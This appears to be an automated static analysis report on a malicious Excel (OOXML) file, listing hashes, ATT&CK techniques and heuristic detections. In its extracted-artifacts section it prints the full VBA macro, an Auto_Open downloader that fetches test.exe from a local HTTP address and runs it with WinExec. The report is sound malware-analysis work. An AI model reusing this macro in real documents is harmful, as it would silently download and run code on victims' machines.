Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b350d4370683b65d…

MALICIOUS

Office (OOXML)

133.8 KB Created: 2021-09-04 13:16:06 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-22
MD5: a4a02775c3654a73380920c998336d81 SHA-1: 17b7f3700311e1c7d2180795dbedd60a0ae9f251 SHA-256: b350d4370683b65d93ca7729e7ea49c2ed7c72638348694a7e888381f1b7fe41
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The VBA macro contains an Auto_Open subroutine that calls ExecuteFile, which in turn calls DownloadFile. DownloadFile uses URLDownloadToFileA to download a file from http://192.168.1.5:8000/test.exe into the user's temporary directory as test.exe. ExecuteFile then uses WinExec to run the downloaded executable. This indicates a clear intent to download and execute a second-stage payload.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.5:8000/test.exe Referenced by macro
    • http://192.168.1.5:8000/test.exe�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1307 bytes
SHA-256: e7fced8fc78e0357444c829a35809cbc74cb036767074ebf97ec3e232281760c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long
Declare PtrSafe Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long

Const SHOW_HIDE As Long = 1


Sub DownloadFile()
     URLDownloadToFileA 0, "http://192.168.1.5:8000/test.exe", Environ("TEMP") & "\test.exe", 0, 0
     
End Sub


Sub ExecuteFile()
     DownloadFile
     Dim var1 As String
     var1 = Environ("TEMP")
     WinExec var1 & "\test.exe", SHOW_HIDE
End Sub

Sub Auto_Open()
    ExecuteFile
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 18432 bytes
SHA-256: 927166ba00425ae868e48afeb61d901f8bd1ebfca961b011e7e8e867a49ce91d

Open this report in the interactive analyzer, or submit your own file for analysis.